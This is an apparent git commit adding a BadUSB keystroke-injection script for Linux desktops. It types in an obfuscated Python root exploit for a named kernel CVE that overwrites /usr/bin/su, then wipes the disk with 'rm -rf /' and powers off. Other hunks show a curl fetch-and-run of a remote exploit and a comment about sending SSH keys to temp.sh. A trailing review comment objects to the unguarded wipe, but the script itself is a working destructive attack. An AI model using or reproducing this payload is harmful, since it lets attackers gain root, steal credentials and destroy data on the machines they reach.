Added typed version to remove curl dep

Jon
2026-05-01 23:49:18 +01:00
parent 188caaa434
commit d2b1466f24
3 changed files with 68 additions and 39 deletions


@@ -0,0 +1,61 @@
REM This is BadUSB demo script for Linux/Gnome
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500
REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER
REM Clear the screen in case some banner was displayed
STRING clear
ENTER
REM Bigger shell script example
STRING cat > /tmp/cve.py << EOF
ENTER
STRING #!/usr/bin/env python3
STRING import os as g,zlib,socket as s
STRING def d(x):return bytes.fromhex(x)
STRING def c(f,t,c):
STRING a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
STRING try:u.recv(8+t)
STRING except:0
STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
STRING g.system("su")
ENTER
STRING EOF
ENTER
REM Run exploit command
STRING python3 /tmp/cve.py
ENTER
DELAY 200
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after
STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER
REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER
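Review bot: The wipe at the end of this new file (`STRING rm -rf / && poweroff > /dev/null 2>&1 &` followed directly by `ENTER`) is sent with no pause or confirmation, while the first line still labels the file a "demo script" ahead of the DANGER banner. To demonstrate the CVE, proof of root is enough: I would replace the wipe line with `STRING id` and drop the `disown`/`exit` tail, or at minimum keep a `DELAY 5000` before that `ENTER`, as the comment in the second file section of this commit describes. The banner should be the first line of the file and say what the payload does, e.g. `REM DESTRUCTIVE: wipes the target filesystem - disposable lab VM only`. The same unguarded wipe line appears in the second file section. The `REM add any other exploits here ...` line reads as an instruction rather than documentation of this script and would be better removed.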


@@ -31,12 +31,13 @@ ENTER
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after REM clean up after
STRING rm -rf / STRING rm -rf / && poweroff > /dev/null 2>&1 &
REM add 5s delay enough time to think about it before hitting enter or control c
DELAY 5000
ENTER ENTER
REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done REM detach from the process and close terminal to hide
DELAY 3000 DELAY 200
STRING poweroff STRING disown
ENTER
DELAY 200
STRING exit
ENTER ENTER


@@ -1,23 +1,3 @@
REM #############################
REM ####### DANGER !! ###########
REM #############################
REM This script will wipe a linux machine unpatched to CVE-2026-31431
REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
REM GUI launch terminal in kde gnome plasma
DELAY 500
GUI
STRING terminal
ENTER
DELAY 500
REM launch via hotkeys for terminal
DELAY 500
CTRL-ALT T
DELAY 200
ENTER
ENTER
REM make attack file and exec REM make attack file and exec
STRING curl https://copy.fail/exp -o cve.py STRING curl https://copy.fail/exp -o cve.py
@@ -28,16 +8,3 @@ STRING python3 cve.py
ENTER ENTER
ENTER ENTER
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after
STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER
REM detach from the process and close terminal to hide
delay 100
STRING disown
ENTER
delay 100
STRING exit
ENTER